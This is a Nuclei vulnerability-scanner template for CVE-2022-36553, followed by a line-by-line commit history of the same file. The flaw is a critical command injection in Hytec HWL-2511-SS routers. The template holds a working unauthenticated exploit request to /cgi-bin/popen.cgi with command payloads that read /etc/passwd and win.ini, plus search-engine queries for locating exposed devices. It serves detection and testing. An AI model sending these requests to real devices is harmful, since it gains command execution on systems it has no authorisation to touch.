nuclei-templates/http/cves/2022/CVE-2022-36553.yaml

id: CVE-2022-36553

info:
  name: Hytec Inter HWL-2511-SS - Remote Command Execution
  author: HuTa0
  severity: critical
  description: |
    Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36553
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/cellular-router-rce.yaml
    - https://gist.github.com/Nwqda/b27418ab801eb0b9cdbe8d042cb0249b
    - https://hytec.co.jp/eng/products/our-brand/hwl-2511-ss.html
    - https://hytec.co.jp/eng/wordpress/wp-content/uploads/2019/09/hwl-2511-ss-ds.3.0.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-36553
    cwe-id: CWE-77
    epss-score: 0.56895
    epss-percentile: 0.97694
    cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: hytec
    product: hwl-2511-ss_firmware
    fofa-query: title="index" && header="lighttpd/1.4.30"
    zoomeye-query:
      - app:"Hytec Inter HWL-2511-SS"
      - app:"hytec inter hwl-2511-ss"
  tags: cve2022,cve,hytec,rce

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1
        Host: {{Hostname}}

    payloads:
      command:
        - "cat%20/etc/passwd"
        - "type%20C://Windows/win.ini"
    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "contains(body_1, '<title>index</title>')"
          - "status_code == 200"
        condition: and

      - type: dsl
        dsl:
          - "contains(body, 'bit app support')"
          - "contains(body, 'fonts')"
          - "contains(body, 'extensions')"
          - "status_code == 200"
          - "contains(body_1, '<title>index</title>')"
        condition: and
# digest: 490a00463044022067859a533b759904c7e875d307e84770ef27b889b0f408fe029359f4b94ac72202200d6c7293956793b176472fde9b977ec5ea069d66d4c5eabf184854b0f88e71c8:922c64590222798bb761d5b6d8e72950
Add: CVE-2022-36553 2023-10-25 08:50:46 +00:00			`id: CVE-2022-36553`

			`info:`
			`name: Hytec Inter HWL-2511-SS - Remote Command Execution`
			`author: HuTa0`
			`severity: critical`
fix matcher 2023-10-25 10:09:27 +00:00			`description: \|`
			`Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.`
			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-36553`
			`- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/cellular-router-rce.yaml`
TemplateMan Update [Sun Oct 29 11:57:58 UTC 2023] :robot: 2023-10-29 11:57:59 +00:00			`- https://gist.github.com/Nwqda/b27418ab801eb0b9cdbe8d042cb0249b`
			`- https://hytec.co.jp/eng/products/our-brand/hwl-2511-ss.html`
			`- https://hytec.co.jp/eng/wordpress/wp-content/uploads/2019/09/hwl-2511-ss-ds.3.0.pdf`
fix matcher 2023-10-25 10:09:27 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2022-36553`
			`cwe-id: CWE-77`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.56895`
			`epss-percentile: 0.97694`
fix matcher 2023-10-25 10:09:27 +00:00			`cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware::::::::`
Add: CVE-2022-36553 2023-10-25 08:50:46 +00:00			`metadata:`
			`verified: true`
TemplateMan Update [Sun Oct 29 11:57:58 UTC 2023] :robot: 2023-10-29 11:57:59 +00:00			`max-request: 4`
			`vendor: hytec`
			`product: hwl-2511-ss_firmware`
fixing typo 2023-10-25 10:27:44 +00:00			`fofa-query: title="index" && header="lighttpd/1.4.30"`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`zoomeye-query:`
			`- app:"Hytec Inter HWL-2511-SS"`
			`- app:"hytec inter hwl-2511-ss"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2022,cve,hytec,rce`
Add: CVE-2022-36553 2023-10-25 08:50:46 +00:00
			`http:`
updated matcher 2023-10-26 07:04:01 +00:00			`- raw:`
			`- \|`
			`GET / HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1`
			`Host: {{Hostname}}`
Add: CVE-2022-36553 2023-10-25 08:50:46 +00:00
			`payloads:`
			`command:`
			`- "cat%20/etc/passwd"`
			`- "type%20C://Windows/win.ini"`
			`stop-at-first-match: true`
TemplateMan Update [Sun Oct 29 11:57:58 UTC 2023] :robot: 2023-10-29 11:57:59 +00:00
Add: CVE-2022-36553 2023-10-25 08:50:46 +00:00			`matchers-condition: or`
			`matchers:`
fix matcher 2023-10-25 10:09:27 +00:00			`- type: dsl`
			`dsl:`
			`- "regex('root:.*:0:0:', body)"`
updated matcher 2023-10-26 07:04:01 +00:00			`- "contains(body_1, '<title>index</title>')"`
fix matcher 2023-10-25 10:09:27 +00:00			`- "status_code == 200"`
Add: CVE-2022-36553 2023-10-25 08:50:46 +00:00			`condition: and`

fix matcher 2023-10-25 10:09:27 +00:00			`- type: dsl`
			`dsl:`
			`- "contains(body, 'bit app support')"`
			`- "contains(body, 'fonts')"`
			`- "contains(body, 'extensions')"`
			`- "status_code == 200"`
updated matcher 2023-10-26 07:04:01 +00:00			`- "contains(body_1, '<title>index</title>')"`
fix matcher 2023-10-25 10:09:27 +00:00			`condition: and`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 490a00463044022067859a533b759904c7e875d307e84770ef27b889b0f408fe029359f4b94ac72202200d6c7293956793b176472fde9b977ec5ea069d66d4c5eabf184854b0f88e71c8:922c64590222798bb761d5b6d8e72950`